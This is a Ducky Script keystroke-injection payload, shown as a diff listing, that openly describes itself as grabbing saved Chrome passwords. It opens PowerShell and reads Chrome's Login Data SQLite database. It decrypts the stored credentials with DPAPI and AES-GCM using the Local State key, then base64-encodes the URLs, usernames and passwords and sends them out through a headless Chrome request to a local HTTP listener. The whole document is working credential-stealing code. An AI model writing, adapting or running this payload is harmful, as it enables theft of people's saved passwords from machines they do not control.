PasswordStuff/ChromePasswords/ChromePasswords.txt
1 | | - | REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord) |
2 | | - | REM Description: Grabs saved Passwords from Chrome |
3 | | - | REM Version: 1.0 |
4 | | - | REM Category: Passwords |
5 | | - | DELAY 5000 |
6 | | - | GUI r |
7 | | - | DELAY 250 |
8 | | - | STRING powershell |
9 | | - | ENTER |
10 | | - | DELAY 2500 |
11 | | - | STRING pwsh |
12 | | - | ENTER |
13 | | - | DELAY 2500 |
14 | | - | STRING $d=Add-Type -A System.Security |
15 | | - | ENTER |
16 | | - | STRING $p='public static' |
17 | | - | ENTER |
18 | | - | STRING $g=""")]$p extern" |
19 | | - | ENTER |
20 | | - | STRING $i='[DllImport("winsqlite3",EntryPoint="sqlite3_' |
21 | | - | ENTER |
22 | | - | STRING $m="[MarshalAs(UnmanagedType.LP" |
23 | | - | ENTER |
24 | | - | STRING $q='(s,i)' |
25 | | - | ENTER |
26 | | - | STRING $f='(p s,int i)' |
27 | | - | ENTER |
28 | | - | STRING $z=$env:LOCALAPPDATA+'\Google\Chrome\User Data' |
29 | | - | ENTER |
30 | | - | STRING $u=[Security.Cryptography.ProtectedData] |
31 | | - | ENTER |
32 | | - | STRING Add-Type "using System.Runtime.InteropServices;using p=System.IntPtr;$p class W{$($i)open$g p O($($m)Str)]string f,out p d);$($i)prepare16_v2$g p P(p d,$($m)WStr)]string l,int n,out p s,p t);$($i)step$g p S(p s);$($i)column_text16$g p C$f;$($i)column_bytes$g int Y$f;$($i)column_blob$g p L$f;$p string T$f{return Marshal.PtrToStringUni(C$q);}$p byte[] B$f{var r=new byte[Y$q];Marshal.Copy(L$q,r,0,Y$q);return r;}}" |
33 | | - | ENTER |
34 | | - | STRING $s=[W]::O("$z\\Default\\Login Data",[ref]$d) |
35 | | - | ENTER |
36 | | - | STRING $l=@() |
37 | | - | ENTER |
38 | | - | STRING if($host.Version-like"7*"){$b=(gc "$z\\Local State"|ConvertFrom-Json).os_crypt.encrypted_key |
39 | | - | ENTER |
40 | | - | STRING $x=[Security.Cryptography.AesGcm]::New($u::Unprotect([Convert]::FromBase64String($b)[5..($b.length-1)],$n,0))}$_=[W]::P($d,"SELECT*FROM logins WHERE blacklisted_by_user=0",-1,[ref]$s,0) |
41 | | - | ENTER |
42 | | - | STRING for(;!([W]::S($s)%100)){$l+=[W]::T($s,0),[W]::T($s,3) |
43 | | - | ENTER |
44 | | - | STRING $c=[W]::B($s,5) |
45 | | - | ENTER |
46 | | - | STRING try{$e=$u::Unprotect($c,$n,0)}catch{if($x){$k=$c.length |
47 | | - | ENTER |
48 | | - | STRING $e=[byte[]]::new($k-31) |
49 | | - | ENTER |
50 | | - | STRING $x.Decrypt($c[3..14],$c[15..($k-17)],$c[($k-16)..($k-1)],$e)}}$l+=($e|%{[char]$_})-join''} |
51 | | - | ENTER |
52 | | - | STRING $r=[Convert]::ToBase64String([Text.Encoding]::ASCII.GetBytes(($l)-join',')) |
53 | | - | ENTER |
54 | | - | STRING start-process "chrome" "--headless http://localhost:8000/?$r" |
55 | | - | ENTER |
56 | | - | DELAY 1000 |
57 | | - | STRING exit |
58 | | - | ENTER |
59 | | - | DELAY 250 |
60 | | - | STRING exit |
61 | | - | ENTER |
62 | | - | |